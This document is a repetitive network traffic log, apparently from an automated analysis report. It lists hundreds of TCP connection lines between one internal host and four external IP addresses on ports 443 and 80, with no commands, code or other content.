                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 172.67.179.215:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 172.67.179.215:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.179.215:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 172.67.179.215:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.179.215:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 172.67.179.215:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.179.215:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.179.215:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 172.67.179.215:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 172.67.179.215:443 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 172.67.179.215:443 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 172.67.179.215:443 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 172.67.179.215:443 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 172.67.179.215:443 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 172.67.179.215:443 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 172.67.179.215:443 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 172.67.179.215:443 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 172.67.179.215:443 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 172.67.179.215:443 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 172.67.179.215:443 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 172.67.179.215:443 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 172.67.179.215:443 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 172.67.179.215:443 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 172.67.179.215:443 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 172.67.179.215:443 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 172.67.179.215:443 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 172.67.179.215:443 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 172.67.179.215:443 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 172.67.179.215:443 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 172.67.179.215:443 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 172.67.179.215:443 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 172.67.179.215:443 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 172.67.179.215:443 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 172.67.179.215:443 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 172.67.179.215:443 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49170
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49170
                    Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49170
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49170
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49170
                    Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49170
                    Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49170
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49170
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 104.168.32.148:80 -> 192.168.2.22:49172
